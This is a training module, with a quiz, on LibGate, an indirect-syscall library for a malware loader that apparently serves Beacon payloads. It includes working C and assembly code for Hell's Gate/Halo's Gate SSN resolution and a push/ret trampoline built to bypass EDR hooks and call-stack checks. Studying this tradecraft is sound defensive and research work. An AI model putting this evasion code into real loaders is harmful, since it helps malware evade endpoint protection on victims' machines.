Difficulty: Intermediate

Module 4: LibGate — Indirect Syscalls

RecycledGate lineage, the SYSCALL_GATE structure, Hell's Gate + Halo's Gate SSN extraction, and the push/ret trampoline for executing syscalls from ntdll's address space.

Module Objective

Understand why indirect syscalls exist, how LibGate resolves System Service Numbers from clean and hooked stubs, and how the push; ret trampoline redirects execution into ntdll so the kernel sees a legitimate return address. By the end of this module you will be able to trace the full path from GetSyscall() through PrepareSyscall() and DoSyscall() to the kernel transition.

1. Why Indirect Syscalls?

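Direct syscalls were the first evolution beyond calling hooked ntdll stubs. By embedding the syscall instruction (opcode 0F 05) directly in the malware's .text section, early tools like SysWhispers1 and Hell's Gate avoided EDR inline hooks entirely. But direct syscalls introduced three new detection vectors: the return address seen after the syscall points into attacker code rather than ntdll, the 0F 05 bytes sit in a module that is not ntdll, and the call stack contains no ntdll frame.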

Indirect syscalls solve all three problems by jumping to a syscall; ret gadget inside ntdll. The actual syscall instruction executes from ntdll's address space, so the return address points into ntdll, the 0F 05 bytes live in a legitimate module, and the call stack contains an ntdll frame.

Direct Syscall
  • syscall instruction in attacker's .text
  • Return address points to attacker code
  • No ntdll frame on the call stack
  • 0F 05 bytes in non-ntdll module
  • Detected by InstrumentationCallback
Indirect Syscall
  • syscall instruction inside ntdll's memory
  • Return address points into ntdll
  • ntdll frame present on the stack
  • 0F 05 bytes in legitimate module
  • Passes InstrumentationCallback checks

2. RecycledGate — The Origin

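LibGate descends from RecycledGate, created by thefLink (github.com/thefLink/RecycledGate). RecycledGate was one of the first public implementations that combined two techniques: Hell's Gate, which reads the SSN directly from a clean stub, and Halo's Gate, which infers it from a neighboring stub when the target is hooked.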

RecycledGate combined these two SSN resolution strategies with indirect syscall trampolining — instead of executing the syscall instruction in its own code, it jumps to the syscall; ret gadget inside ntdll's own stub. The name "Recycled" refers to reusing ntdll's own syscall gadgets rather than embedding new ones.

From RecycledGate to LibGate

RecycledGate used internal djb2 hash resolution to find target functions in ntdll's export table. LibGate, rasta-mouse's Crystal Palace port, removes this coupling. Instead of hashing internally, LibGate takes the ntdll base address and function pointer as external parameters, resolved by the caller via the Crystal Palace DFR (Dynamic Function Resolution) system. This makes LibGate hash-algorithm-agnostic — the caller can use djb2, ROR13, CRC32, or any other hash to find the function before passing it to LibGate.
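
To make "hash-algorithm-agnostic" concrete, the following is a minimal sketch of the classic djb2 string hash, one of the options a caller might use to identify an export name before handing the resolved pointer to LibGate. The name djb2_hash is illustrative and is not part of LibGate or RecycledGate, and RecycledGate's own variant may use a different seed or multiplier.

```c
#include <stdint.h>

/* Classic djb2: start at 5381, then hash = hash * 33 + c for each byte.
 * Illustrative only; not taken from RecycledGate or LibGate. */
uint32_t djb2_hash(const char *s)
{
    uint32_t hash = 5381u;
    while (*s != '\0') {
        hash = hash * 33u + (uint8_t)*s;
        s++;
    }
    return hash;
}
```

Because LibGate only ever receives the resolved pointer, swapping this function for ROR13 or CRC32 would not require any change on the LibGate side.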

3. LibGate Architecture

LibGate is rasta-mouse's Crystal Palace port of RecycledGate. The API is declared in gate.h, and the implementation is provided as a precompiled library shipped inside libgate.x64.zip. The entire API surface consists of one structure and three functions.

The SYSCALL_GATE Structure

C (gate.h)
typedef struct {
    DWORD ssn;       // System Service Number (index into SSDT)
    PVOID jmpAddr;   // Address of syscall;ret gadget inside ntdll
} SYSCALL_GATE;

This structure is the output of SSN resolution. It stores everything needed to execute an indirect syscall: the SSN to load into EAX, and the address to jump to for the actual syscall instruction.

The Three Functions

C (gate.h)
// Resolve the SSN and syscall gadget address for a given Nt* function
BOOL GetSyscall     (PVOID ntdll, PVOID func, SYSCALL_GATE * gate);

// Stage the SSN and jump address in registers (r11, r10)
void PrepareSyscall (DWORD ssn, PVOID addr);

// Execute the syscall via push/ret trampoline
void DoSyscall      ();

Key Architectural Difference

GetSyscall() takes the ntdll base address and function pointer as parameters. These are resolved externally by the caller — typically via Crystal Palace's DFR directive. RecycledGate resolved these internally using djb2 hashing. By externalizing resolution, LibGate becomes a pure syscall execution engine that is independent of any specific function resolution strategy.

4. GetSyscall() — The Core Algorithm

The GetSyscall() function resolves the SSN and locates the indirect syscall gadget. It follows a four-step process: pattern match the target stub, detect hooks, search neighbors if hooked, and find the syscall; ret gadget address.

Step 1 — Pattern Match (Hell's Gate)

The function first checks the target stub's leading bytes for the clean (unhooked) pattern:

Byte Pattern
Offset  Bytes          Instruction
------  -------------  ----------------------------
0x00    4C 8B D1       mov r10, rcx
0x03    B8 xx xx       mov eax, imm32 (opcode B8, then <SSN_LO> <SSN_HI>)
0x06    00 00          (upper bytes of imm32, always 0 for valid SSNs < 0x200)

If the first four bytes match 4C 8B D1 B8, the stub is clean. The SSN is the 16-bit little-endian value at offsets 4 and 5:

C (Hell's Gate Check)
// Check for clean stub signature: 4C 8B D1 B8
PBYTE stub = (PBYTE)func;

if (stub[0] == 0x4C &&    // mov r10, rcx (byte 1)
    stub[1] == 0x8B &&    // mov r10, rcx (byte 2)
    stub[2] == 0xD1 &&    // mov r10, rcx (byte 3)
    stub[3] == 0xB8 &&    // mov eax, imm32 (opcode)
    stub[6] == 0x00 &&    // upper bytes of SSN must be zero
    stub[7] == 0x00)       // (valid SSNs are < 0x200)
{
    // SSN is the 16-bit little-endian value at offset 4-5
    gate->ssn = (stub[5] << 8) | stub[4];
    // ... proceed to find syscall;ret gadget
}
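
The check above can be exercised without touching ntdll at all. The sketch below is a portable version that operates on a plain byte buffer; the name read_clean_ssn and the use of stdint types instead of DWORD/PBYTE are assumptions made so the example compiles anywhere, and it is not LibGate's actual code.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Returns true and writes the SSN if the first 8 bytes of stub match
 * 4C 8B D1 B8 lo hi 00 00 (mov r10, rcx; mov eax, imm32).
 * Hypothetical helper for illustration. */
bool read_clean_ssn(const uint8_t *stub, size_t len, uint16_t *ssn)
{
    if (stub == NULL || ssn == NULL || len < 8)
        return false;

    /* mov r10, rcx followed by the mov eax, imm32 opcode */
    if (stub[0] != 0x4C || stub[1] != 0x8B || stub[2] != 0xD1 || stub[3] != 0xB8)
        return false;

    /* Upper half of the imm32 must be zero */
    if (stub[6] != 0x00 || stub[7] != 0x00)
        return false;

    /* Little-endian: low byte at offset 4, high byte at offset 5 */
    *ssn = (uint16_t)((stub[5] << 8) | stub[4]);
    return true;
}
```

For the buffer 4C 8B D1 B8 18 00 00 00 this yields an SSN of 0x18; a buffer that starts with E9 is rejected.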

Step 2 — Hook Detection

In the actual RecycledGate source, Steps 1 and 2 are interleaved inside a single scanning loop. Each iteration checks for three conditions in order: (1) whether the stub is hooked (0xE9 JMP opcode), (2) whether a 0xC3 (RET) opcode is encountered — which signals early termination of the scan since the stub boundary has been reached — and (3) whether the clean 4C 8B D1 B8 pattern matches. They are presented here as separate steps for clarity, but understand they execute as one loop in practice.

C (Hook Detection - within the scanning loop)
BOOL bHooked = FALSE;

// 0xE9 = JMP rel32 (5-byte relative jump) - stub is hooked
if (stub[0] == 0xE9) {
    bHooked = TRUE;
    // Cannot extract SSN from this stub - bytes are overwritten
    // Fall through to neighbor search (Halo's Gate)
}

// 0xC3 = RET opcode - early termination of the scan
// If we hit a ret before finding the pattern, stop searching
if (stub[0] == 0xC3) {
    // Stub boundary reached; abort scan
    return FALSE;
}
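
The three conditions described above can be folded into one classifier, checked in the same order as the scanning loop. This is a sketch on a plain byte buffer; StubState and classify_stub are hypothetical names, and real hooks can take forms other than a leading E9, which would land in STUB_UNKNOWN here.

```c
#include <stddef.h>
#include <stdint.h>

typedef enum {
    STUB_CLEAN,    /* starts with 4C 8B D1 B8 */
    STUB_HOOKED,   /* starts with E9 (jmp rel32) */
    STUB_END,      /* starts with C3 (ret): scan should stop */
    STUB_UNKNOWN   /* anything else, or buffer too short */
} StubState;

/* Classify the first bytes of a stub. Order matches the text:
 * hook check, then ret check, then clean-pattern check. */
StubState classify_stub(const uint8_t *stub, size_t len)
{
    if (stub == NULL || len < 4)
        return STUB_UNKNOWN;
    if (stub[0] == 0xE9)
        return STUB_HOOKED;
    if (stub[0] == 0xC3)
        return STUB_END;
    if (stub[0] == 0x4C && stub[1] == 0x8B &&
        stub[2] == 0xD1 && stub[3] == 0xB8)
        return STUB_CLEAN;
    return STUB_UNKNOWN;
}
```

Returning a state instead of a BOOL keeps the "hooked, try neighbors" case distinct from the "boundary reached, give up" case.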

Step 3 — Neighbor Search (Halo's Gate)

When the target stub is hooked, LibGate searches neighboring stubs. In ntdll, syscall stubs are laid out sequentially at 32-byte intervals, and SSNs are consecutive. If the stub at offset +2 (64 bytes later) is clean and has SSN 0x1A, then the target stub's SSN is 0x1A - 2 = 0x18.

C (Halo's Gate - Neighbor Search)
if (bHooked) {
    // Single loop: check BOTH directions per iteration
    // Bounded by the number of exported functions, with boundary checks
    for (DWORD i = 1; i < pExportDir->NumberOfFunctions; i++) {

        // Search DOWN: neighbor at stub + (i * 32)
        PBYTE neighborDown = stub + (i * 32);
        if (neighborDown[0] == 0x4C &&
            neighborDown[1] == 0x8B &&
            neighborDown[2] == 0xD1 &&
            neighborDown[3] == 0xB8)
        {
            // Clean neighbor found below
            // neighbor SSN - i = our SSN (SSNs are sequential)
            gate->ssn = ((neighborDown[5] << 8) | neighborDown[4]) - i;
            break;
        }

        // Search UP: neighbor at stub - (i * 32)
        PBYTE neighborUp = stub - (i * 32);
        if (neighborUp[0] == 0x4C &&
            neighborUp[1] == 0x8B &&
            neighborUp[2] == 0xD1 &&
            neighborUp[3] == 0xB8)
        {
            // Clean neighbor found above
            // neighbor SSN + i = our SSN
            gate->ssn = ((neighborUp[5] << 8) | neighborUp[4]) + i;
            break;
        }
    }
}
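
The neighbor arithmetic is easy to verify on a synthetic stub table. The sketch below assumes, as the text does, a fixed 32-byte stride and consecutive SSNs; infer_ssn_from_neighbors and neighbor_is_clean are hypothetical names, and the explicit index bounds stand in for the boundary checks a real implementation would perform against the mapped image.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define STUB_SIZE 32u

static bool neighbor_is_clean(const uint8_t *s)
{
    return s[0] == 0x4C && s[1] == 0x8B && s[2] == 0xD1 && s[3] == 0xB8;
}

/* table holds stub_count consecutive 32-byte stubs; target is an index.
 * Returns true and writes the inferred SSN when a clean neighbor exists. */
bool infer_ssn_from_neighbors(const uint8_t *table, size_t stub_count,
                              size_t target, uint16_t *ssn)
{
    if (table == NULL || ssn == NULL || target >= stub_count)
        return false;

    for (size_t i = 1; i < stub_count; i++) {
        /* Higher address: the neighbor's SSN is i above the target's */
        if (target + i < stub_count) {
            const uint8_t *down = table + (target + i) * STUB_SIZE;
            if (neighbor_is_clean(down)) {
                uint16_t n = (uint16_t)((down[5] << 8) | down[4]);
                if (n >= i) {
                    *ssn = (uint16_t)(n - i);
                    return true;
                }
            }
        }
        /* Lower address: the neighbor's SSN is i below the target's */
        if (i <= target) {
            const uint8_t *up = table + (target - i) * STUB_SIZE;
            if (neighbor_is_clean(up)) {
                uint16_t n = (uint16_t)((up[5] << 8) | up[4]);
                *ssn = (uint16_t)(n + i);
                return true;
            }
        }
    }
    return false;
}
```

With five stubs carrying SSNs 0x16 through 0x1A and stubs 2 and 3 overwritten with E9, a lookup for index 2 skips the hooked stub below it and recovers 0x18 from the clean stub above.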

Why Neighbor Search Works

EDRs hook selectively. Out of 400+ Nt* syscall stubs in ntdll, an EDR typically hooks only the high-value targets: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThread, etc. Hooking every stub would cause severe performance degradation. In practice, a clean neighbor is usually within a few stubs of any hooked target.

Step 4 — Find the syscall;ret Gadget

Whether the SSN came from the target stub (Step 1) or a neighbor (Step 3), LibGate now needs the address of the syscall; ret instruction sequence within the resolved stub. It scans for the three-byte pattern 0F 05 C3:

C (Gadget Search)
// If the stub was hooked, pStub has already been reassigned
// to the clean neighbor's address during the Halo's Gate search.
// The gadget search operates on whichever stub pStub points to.

// offset + 2 < 32 keeps the three-byte compare inside the 32-byte stub
for (DWORD offset = 0; offset + 2 < 32; offset++) {
    if (pStub[offset]     == 0x0F &&   // syscall (byte 1)
        pStub[offset + 1] == 0x05 &&   // syscall (byte 2)
        pStub[offset + 2] == 0xC3)     // ret
    {
        gate->jmpAddr = &pStub[offset]; // Address of syscall;ret in ntdll
        break;
    }
}

The jmpAddr now points to the 0F 05 C3 bytes inside ntdll's memory. When execution jumps here, the CPU will execute syscall from ntdll's address range and then ret back to the caller.
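
The scan itself is a bounded three-byte search, sketched here on a plain buffer. find_syscall_ret is a hypothetical name; it returns an offset rather than a pointer so a failed search is unambiguous.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns the offset of the first 0F 05 C3 sequence in stub[0..len),
 * or -1 if none is found. Never reads past len. */
ptrdiff_t find_syscall_ret(const uint8_t *stub, size_t len)
{
    if (stub == NULL || len < 3)
        return -1;

    for (size_t off = 0; off + 2 < len; off++) {
        if (stub[off]     == 0x0F &&   /* syscall (byte 1) */
            stub[off + 1] == 0x05 &&   /* syscall (byte 2) */
            stub[off + 2] == 0xC3)     /* ret */
            return (ptrdiff_t)off;
    }
    return -1;
}
```

A caller would add the returned offset to the stub's base address to obtain the value stored in jmpAddr, and treat -1 as a resolution failure rather than leaving jmpAddr unset.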

GetSyscall() Resolution Flow

  1. Read stub bytes at func
  2. Pattern match: 4C 8B D1 B8?
  3. Hook check: byte[0] == E9?
  4. Neighbor scan: ±32-byte stubs
  5. Find 0F 05 C3: syscall;ret gadget

5. The Push/Ret Trampoline

Once GetSyscall() has resolved the SSN and gadget address, the caller uses PrepareSyscall() and DoSyscall() to actually execute the syscall. These two functions implement a push/ret trampoline — a technique that uses the stack to redirect execution into ntdll without a direct jmp.

PrepareSyscall — Stage the Registers

x86-64 ASM
; PrepareSyscall(DWORD ssn, PVOID addr)
; Windows x64 calling convention: ecx = ssn, rdx = addr
PrepareSyscall:
    xor  r11, r11          ; Zero r11
    xor  r10, r10          ; Zero r10
    mov  r11, rcx          ; r11  = SSN (first param)
    mov  r10, rdx          ; r10  = jmpAddr (second param, ntdll gadget)
    ret                    ; Return to caller

DoSyscall — Execute via Push/Ret

x86-64 ASM
; DoSyscall()
; Called after PrepareSyscall staged r11 (SSN) and r10 (jmpAddr)
; The caller has already placed syscall arguments in RCX, RDX, R8, R9
DoSyscall:
    push r10               ; Push ntdll gadget address onto the stack
    xor  rax, rax          ; Zero rax
    mov  r10, rcx          ; r10 = rcx (Windows syscall ABI: kernel reads arg1 from r10)
    mov  eax, r11d         ; eax = SSN (System Service Number)
    ret                    ; Pop ntdll gadget address into RIP → jump to syscall;ret

The critical trick is the pairing of the first and last instructions: push r10 places the ntdll gadget address on top of the stack, and ret pops it into RIP. The CPU now executes ntdll's syscall; ret sequence. After the kernel returns, the ret in ntdll's gadget pops the original return address (pushed when the caller called DoSyscall) and returns control to the loader.

Push/Ret Trampoline — Full Execution Flow

1. Caller invokes PrepareSyscall(ssn, jmpAddr) → stores SSN in r11, gadget addr in r10
2. Caller sets up RCX, RDX, R8, R9 with the actual syscall arguments
3. Caller invokes DoSyscall()
4. DoSyscall pushes r10 (ntdll gadget address) onto the stack
5. Sets r10 = rcx (Windows ABI: kernel reads 1st arg from r10), eax = SSN
6. ret pops ntdll gadget address into RIP — CPU jumps to ntdll
7. CPU executes syscall from ntdll's address space
8. Kernel transition: the user-mode return address lies inside ntdll, so return-address checks pass
9. Kernel returns, ntdll's ret pops the original return address
10. Execution returns to the original caller cleanly

Why Push/Ret Instead of JMP?

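A jmp through a register would also reach the gadget, and the caller's return address would still be on the stack, so the return path alone does not rule it out. The constraint is r10: the kernel expects the first argument there, so DoSyscall must overwrite r10 with rcx before the transition, and after that r10 no longer holds the gadget address. Pushing r10 first parks the gadget address on the stack and frees the register. With push r10; ... ret, the stack is set up so that:
  • The ret in DoSyscall pops the gadget address into RIP, transferring control to ntdll's syscall; ret
  • The ret in the gadget pops the caller's original return address, transferring control back to the code that called DoSyscall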

The two ret instructions chain together naturally through the stack, giving clean bidirectional control flow.
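
The chaining can be replayed with a toy stack model. This is a sketch only: ToyStack and simulate_trampoline are hypothetical names, the addresses passed in are placeholders, and nothing here executes a real syscall.

```c
#include <stdint.h>

typedef struct {
    uint64_t slots[8];
    int      depth;   /* number of live entries; slots[depth - 1] is the top */
} ToyStack;

static void toy_push(ToyStack *s, uint64_t v) { s->slots[s->depth++] = v; }
static uint64_t toy_pop(ToyStack *s) { return s->slots[--s->depth]; }

/* Replays the control transfers and records where RIP lands after each ret. */
void simulate_trampoline(uint64_t caller_ret, uint64_t gadget,
                         uint64_t *rip_after_first_ret,
                         uint64_t *rip_after_second_ret)
{
    ToyStack st = { {0}, 0 };

    toy_push(&st, caller_ret);              /* call DoSyscall pushes the return address */
    toy_push(&st, gadget);                  /* push r10 */
    *rip_after_first_ret  = toy_pop(&st);   /* ret in DoSyscall: RIP = gadget */
    *rip_after_second_ret = toy_pop(&st);   /* ret in the gadget: RIP = caller */
}
```

The model shows why no extra bookkeeping is needed: the push adds exactly one slot, the first ret consumes it, and the stack the gadget sees is the one the caller's call instruction left behind.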

6. LibGate in GCC Inline Assembly

Crystal Palace builds with MinGW (GCC), not MSVC. This matters because MSVC does not support inline x64 assembly at all. MinGW does, using GCC's inline assembly syntax. LibGate uses the __attribute__((naked)) function attribute to emit pure assembly without compiler-generated prologue/epilogue code:

C (gate.c - GCC Inline ASM)
// Naked functions use basic asm (no operands), so registers take a single %
__attribute__((naked)) void PrepareSyscall(DWORD ssn, PVOID addr) {
    __asm__(
        "xor %r11, %r11\n"
        "xor %r10, %r10\n"
        "mov %rcx, %r11\n"
        "mov %rdx, %r10\n"
        "ret\n"
    );
}

__attribute__((naked)) void DoSyscall() {
    __asm__(
        "push %r10\n"
        "xor %rax, %rax\n"
        "mov %rcx, %r10\n"
        "mov %r11d, %eax\n"
        "ret\n"
    );
}

AT&T vs Intel Syntax

GCC uses AT&T syntax by default (registers prefixed with %, source-destination order reversed relative to Intel syntax). Naked functions use basic asm, where a single % is written as-is; the doubled %% escape applies only to extended asm templates that take operands. The Crystal Palace build system can pass the -masm=intel flag to switch to Intel syntax, in which case the assembly looks identical to the MASM/NASM style shown in Section 5. The naked attribute ensures the compiler emits no prologue (push rbp; mov rbp, rsp) or epilogue (pop rbp; ret); the function body is purely what the programmer writes.

This GCC requirement is why Crystal-Loaders (and Crystal Palace in general) targets the MinGW toolchain. The entire build pipeline — from COFF object compilation through PIC linking — uses GCC and its associated linker, not the MSVC toolchain.

7. Technique Comparison

LibGate sits in the lineage of syscall evasion techniques. This table shows how it compares to prior art across the key dimensions: SSN resolution method, execution strategy, hook bypass capability, and where the return address points after the syscall.

Technique      SSN Source                    Execution             Hook Bypass           Return Addr
-------------  ----------------------------  --------------------  --------------------  -----------
Hell's Gate    Stub pattern match            Direct syscall        No (fails if hooked)  In malware
Halo's Gate    Neighbor search               Direct syscall        Yes                   In malware
SysWhispers2   Sort by address               Direct syscall        Yes                   In malware
SysWhispers3   Sort by address               Indirect (jmp ntdll)  Yes                   In ntdll
RecycledGate   Hell+Halo pattern             Indirect (push;ret)   Yes                   In ntdll
LibGate        Hell+Halo (external resolve)  Indirect (push;ret)   Yes                   In ntdll

The key evolution across these techniques is twofold: first, from failing on hooks (Hell's Gate) to handling hooks gracefully (Halo's Gate, SysWhispers2); second, from direct execution (return address in malware) to indirect execution (return address in ntdll). LibGate combines both advances while decoupling from any specific hash algorithm.

8. Usage Pattern in Crystal-Loaders

In the Crystal-Loaders codebase, LibGate is not called directly by the main loader code. Instead, a wrapper function ResolveSyscallEntry() bridges the DFR-resolved function pointer and LibGate's GetSyscall():

C (Crystal-Loaders)
void ResolveSyscallEntry(PVOID ntdll, PVOID func, SYSCALL_API_ENTRY * entry)
{
    SYSCALL_GATE gate;
    memset(&gate, 0, sizeof(SYSCALL_GATE));

    if (GetSyscall(ntdll, func, &gate))
    {
        entry->fnAddr  = func;       // Original function address (for reference)
        entry->sysnum  = gate.ssn;   // Resolved System Service Number
        entry->jmpAddr = gate.jmpAddr; // ntdll syscall;ret gadget address
    }
}

The SYSCALL_API_ENTRY structure stores the resolved data for later use. When the loader needs to execute a syscall (for example, NtAllocateVirtualMemory to map memory for the Beacon payload), it follows this sequence:

C (Calling Pattern)
// 1. Prepare - stage SSN and gadget address in r11/r10
PrepareSyscall(entry->sysnum, entry->jmpAddr);

// 2. Execute - the compiler places NtAllocateVirtualMemory's args
//    in RCX, RDX, R8, R9 per the x64 calling convention,
//    then DoSyscall() trampolines into ntdll
NTSTATUS status = DoSyscall(
    hProcess,          // RCX → ProcessHandle
    &baseAddress,      // RDX → *BaseAddress
    0,                 // R8  → ZeroBits
    &regionSize,       // R9  → *RegionSize
    MEM_COMMIT | MEM_RESERVE,  // [rsp+0x28]
    PAGE_READWRITE             // [rsp+0x30]
);

The Complete Chain

Putting it all together, the Crystal-Loaders syscall path is:

  1. DFR resolves the ntdll base and target function address (hash-agnostic)
  2. GetSyscall() extracts the SSN via Hell's Gate / Halo's Gate and locates the syscall;ret gadget
  3. PrepareSyscall() stages the SSN and gadget address in r11/r10
  4. DoSyscall() trampolines execution into ntdll via push; ret
  5. The kernel sees a return address inside ntdll — everything looks legitimate

Module 4 Quiz: LibGate — Indirect Syscalls

Q1: Why does LibGate's DoSyscall use push r10; ... ret instead of jmp r10?

The push r10; ret pattern places the ntdll gadget address on the stack, then ret pops it into RIP to redirect execution. This leaves the caller's original return address as the next entry on the stack, so after ntdll's syscall; ret executes, that second ret returns control to the loader cleanly. Pushing the address first also frees r10, which DoSyscall must overwrite with rcx because the kernel reads the first argument from r10; a jmp r10 issued after that point would no longer target the gadget.

Q2: How does Halo's Gate resolve an SSN when the target stub is hooked?

Syscall stubs in ntdll are laid out sequentially at 32-byte intervals with consecutive SSNs. Halo's Gate searches neighboring stubs in both directions (±32, ±64, ±96, etc.) until it finds one that is not hooked. It then reads that neighbor's SSN and adjusts it by the distance (in stub count) to compute the target's SSN. This works because EDRs only hook a subset of the 400+ available syscall stubs.

Q3: What makes LibGate different from the original RecycledGate?

RecycledGate uses an internal djb2 hash to resolve target functions from ntdll's export table. LibGate removes this coupling by accepting the ntdll base address and function pointer as external parameters, resolved by the caller (via Crystal Palace's DFR system). This makes LibGate hash-algorithm-agnostic — the caller can use any hash or resolution strategy to find the function before passing it to LibGate.